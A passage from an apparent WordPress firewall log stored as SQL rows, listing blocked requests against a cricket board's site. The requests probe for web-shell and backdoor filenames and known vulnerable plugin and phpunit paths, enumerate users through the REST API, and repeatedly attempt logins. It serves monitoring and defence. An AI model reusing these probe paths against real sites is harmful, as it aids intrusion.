Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','60THZVQAlBR5LCi9GW1eyXqE',0,1674090883.2255,143,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VWFkOeKLZESlIDiNt40Gws1v',0,1674090887.4732,238,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','caAOIPFdgxENmSCnJwhpz8V9',0,1674090891.1148,151,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dTQirINslfE6WpaMeyb9utkn',0,1674090895.0226,145,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MUTg8y1cFQ9nXwG2e7YalZB4',0,1674090899.2045,91,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1FpfB4tSH80vyQTPYWZU5EVO',0,1674090903.1758,142,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OJVnTjWKtlGA43BsYy7hC52Z',0,1674090906.1655,161,'','POST',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4zMvIPoi5GJBtDcSr0guTxHk',0,1674090909.9441,130,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JrFIoDGlbptj2OqhvT6nSzkP',0,1674090913.5488,114,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OgrwilpuEs4cvLehjF5AKTa6',0,1674090917.6266,205,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HYcoJdKCh6VnIlD4z2kaBGXv',0,1674090921.7675,312,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EXZ1pnR0KDwv9jBIPoqVAfd5',0,1674090926.5549,389,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cM9et0ZvQAOBhrWnmHiCfJup',0,1674090930.4221,164,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YsSkEpRQW3BqCVluI0oyx4vD',0,1674090934.7544,474,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','k70xwI2U3fy1KRCaJ5gDhp6o',0,1674090939.9283,251,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Uk6giQmwYpHV1WC0I3sZoMBA',0,1674090943.3730,508,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FPKHf9uBsn2UArtLMIjYmvNk',0,1674090947.9258,197,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LiNfvup38jx6arA57SB10hsk',0,1674090952.2792,606,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vxzOXQPZk9acBi7ydNVDSKF0',0,1674090956.6458,255,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1pNLdPDnlhZF9y2RYB0ocxS8',0,1674090961.0226,188,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IWozahV0FJZBmRrfgQX1CdPU',0,1674090965.8520,244,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','isfdYQAH5waMOvyWogV3NJ8C',0,1674090971.1263,198,'','GET',403,0,700,0,1,'',0),('65.109.173.30',1097706782,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Qam5zGC8kV0Wt4HpSMBdJgq6',0,1674090975.3196,309,'','GET',403,0,700,0,1,'',0),('20.1.172.179',335654067,'','https://yorkshirecricketboard.org.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','h8QoEDNxFwVH2a6SuGnmUbLv',0,1674092618.2162,609,'','POST',403,0,700,0,1,'',0),('20.1.172.179',335654067,'','https://yorkshirecricketboard.org.uk/ylfzgypy.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','VLgCu4d9WTB2ef5lK7s3qjP8',0,1674092619.3286,730,'','GET',403,0,700,0,1,'',0),('20.1.172.179',335654067,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','iKgzR7J9vjfWYMTxs20p6yVB',0,1674092619.7844,280,'','GET',403,0,700,0,1,'',0),('20.1.172.179',335654067,'','https://yorkshirecricketboard.org.uk/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','snRYx2k1SZOJQDTmyH0gL5Go',0,1674092620.3440,245,'','GET',403,0,700,0,1,'',0),('20.1.172.179',335654067,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Svp5wXFIZH18LeWghJ7qUEYP',0,1674092620.7056,188,'','GET',403,0,700,0,1,'',0),('20.1.172.179',335654067,'','https://yorkshirecricketboard.org.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','bgRBv2IL0FxPiD8C3QJc6hS5',0,1674092621.1530,274,'','GET',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/99.0.4844.84 Safari\\/537.36\"}','Jug3mo6EId8A5zXWR9P27Hlb',0,1674094132.4259,289,'','POST',403,0,600,0,1,'',0),('91.107.247.215',1533802455,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','KfuMjkQ37RhWXnUNlwEcqGYZ',0,1674096721.8167,370,'','GET',403,0,520,0,1,'',0),('91.107.247.215',1533802455,'','https://yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','1ipxqBWR97FsgA3U4JZuvnCG',0,1674096722.8459,171,'','GET',403,0,520,0,1,'',0),('107.189.13.99',1807551843,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','L9t0sRqzaT324bFjDQy1AlBd',0,1674097390.7920,11361,'','POST',403,0,600,0,1,'',0),('91.107.250.214',1533803222,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','WOhJXk1Qc6tAl5sibad8r2uq',0,1674101253.6044,241,'','GET',403,0,520,0,1,'',0),('91.107.250.214',1533803222,'','https://www.yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','86y1GmgRceiF4WVarSqMPjDk',0,1674101254.1376,187,'','GET',403,0,520,0,1,'',0),('107.189.13.99',1807551843,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','UHf5Ei7ybLQVwWqZe8pRc9Nu',0,1674103530.6544,232,'','POST',403,0,600,0,1,'',0),('107.189.3.40',1807549224,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','sEcSp9Kqd4kUjI8rT62Dxw5V',0,1674105961.5657,111,'','POST',403,0,600,0,1,'',0),('104.244.77.192',1760841152,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','qhvKOkjeYtFMxia9Pwu7yEG8',0,1674111027.3589,286,'','POST',403,0,600,0,1,'',0),('205.185.121.252',3451484668,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','7ZPtAU8WqJdM41YGmuohTb0K',0,1674113597.6872,212,'','POST',403,0,600,0,1,'',0),('137.74.93.23',2303352087,'','https://www.yorkshirecricketboard.org.uk/Telerik.Web.UI.WebResource.axd?type=rau','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/7046A194A\"}','YWFXMSUj6d93Z5CifyG2sB8o',0,1674117265.0581,168,'','GET',403,0,700,0,1,'',0),('78.47.169.111',1311746415,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','fMH7tZuzC6Ii58LcJADrGnkS',0,1674124909.5139,179,'','GET',403,0,520,0,1,'',0),('78.47.169.111',1311746415,'','https://yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','ni2RPCSDZ4Btab5fOEuoeF30',0,1674124911.0246,779,'','GET',403,0,520,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','WSfnqwvrQIudg8EUYotRZ3zD',0,1674125001.0714,192,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','LhaZxziyRcwglMbemqoYHkJV',0,1674128006.8667,1117,'','POST',403,0,600,0,1,'',0),('171.22.25.70',2870352198,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vpl2gxZeTqLkIrORWnAYs6DM',0,1674128204.7543,1165,'','POST',403,0,600,0,1,'',0),('194.233.77.183',3270069687,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QF1Def06GCdz3p5BUSMvZ7Vq',0,1674128895.9298,911,'','POST',403,0,600,0,1,'',0),('91.107.250.214',1533803222,'','https://www.yorkshirecricketboard.org.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','alc8MAPw6hjVg9o1IYELvXn3',0,1674129425.8229,353,'','GET',403,0,520,0,1,'',0),('91.107.250.214',1533803222,'','https://www.yorkshirecricketboard.org.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','cdxNvKXrUP0y1MltTYub843I',0,1674129427.0149,554,'','GET',403,0,520,0,1,'',0),('45.61.184.58',759019578,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.114 Safari\\/537.36\"}','GneSvXMy6g7LrUCZoatlNDBA',0,1674130281.4301,127,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','vB5Pm8FwSKpgVTo1Hndkhs0z',0,1674133771.6091,105,'','POST',403,0,600,0,1,'',0),('91.107.250.214',1533803222,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','9V6GTUCkvwXHsEqthbpzDa40',0,1674134432.3163,141,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','PX4piECh6blLJTv5ukYjfyHx',0,1674134821.1243,176,'','POST',403,0,600,0,1,'',0),('209.141.43.56',3515689784,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','FXEB4QdH2V8egk0uGj5rwDOh',0,1674136280.2049,128,'','POST',403,0,600,0,1,'',0),('91.107.253.83',1533803859,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','tSEyYenqAzCk0w8xU2oMPiIJ',0,1674137413.9290,127,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','nXwTxgcrFKVsIkf40dB1SDeH',0,1674137809.9881,204,'','POST',403,0,600,0,1,'',0),('78.47.169.111',1311746415,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','ueOCRXKmj40il6UdknHsvZyY',0,1674140397.3206,298,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','AxcHVUJgE2Sb6CoBjunYKNDr',0,1674140741.9412,329,'','POST',403,0,600,0,1,'',0),('91.107.253.83',1533803859,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','7IDf54lajqiJLAo2ehO3MtKr',0,1674142617.6965,178,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','eNsTnIAVdlfX8bytKu9JmqR0',0,1674142864.4320,229,'','POST',403,0,600,0,1,'',0),('91.107.253.83',1533803859,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','wrD2cfjBiJs8m5V9lGCPxHpY',0,1674144666.0492,214,'','POST',403,0,600,0,1,'',0),('78.47.169.111',1311746415,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','PXCjpS7vGsuQzw3VtdJR1eFo',0,1674144916.3328,166,'','POST',403,0,600,0,1,'',0),('107.189.3.40',1807549224,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','GmspaEJlkLjQrc07WOR8qIK3',0,1674146070.7587,140,'','POST',403,0,600,0,1,'',0),('91.107.250.214',1533803222,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','pNKxRdMoSWbn9IfPvUja5l87',0,1674146756.0722,256,'','POST',403,0,600,0,1,'',0),('91.107.247.215',1533802455,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','ytTc91XpoCuhQ7mk0KMnaBsd',0,1674146989.3567,586,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','CxubGp8mNk5cBLFVHvgAafWw',0,1674148809.1777,147,'','POST',403,0,600,0,1,'',0),('78.47.169.111',1311746415,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','oUsfE28HXtyJPWb6RVCrlxL3',0,1674149067.4039,153,'','POST',403,0,600,0,1,'',0),('45.61.188.188',759020732,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','AI2KSrjhF1ZspkoCXq3tMETD',0,1674149501.4261,125,'','POST',403,0,600,0,1,'',0),('91.107.247.215',1533802455,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','tYzVxW18MI0vJhGwcaBsSP2o',0,1674150933.3741,197,'','POST',403,0,600,0,1,'',0),('82.165.88.30',1386567710,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','wTsde9gUNcEMRPfWijSlOm61',0,1674152305.7537,937,'','POST',403,0,600,0,1,'',0),('45.61.188.188',759020732,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.74.9 (KHTML, like Gecko) Version\\/7.0.2 Safari\\/537.74.9\"}','wzYTOlqrSCQNjMcptguoiHPI',0,1674153266.4472,112,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','hzEZPuiFvWNm2fjbwK6ALcxG',0,1674153327.5900,184,'','POST',403,0,600,0,1,'',0),('104.244.77.229',1760841189,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','4bRI7HnaQZMNzLJgBwcGvfKp',0,1674154125.7972,116,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','fVmS6eksQNLyzYKqZxA9cD74',0,1674155188.4878,154,'','POST',403,0,600,0,1,'',0),('159.69.109.134',2672127366,'','https://www.yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','Vmq16W4fMgAFUHjOZxYybC3L',0,1674155451.9411,186,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','y4avRS76hIxdCuBH9sT1oNwb',0,1674156223.1194,204,'','POST',403,0,600,0,1,'',0),('78.47.169.111',1311746415,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','SsQykcVX6AUOj2L84o7FmnpZ',0,1674158089.5628,145,'','POST',403,0,600,0,1,'',0),('107.189.1.148',1807548820,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','lBXC4FaHEKn3NGV0Yjhki2Tu',0,1674159671.4248,544,'','POST',403,0,600,0,1,'',0),('185.231.115.174',3118953390,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 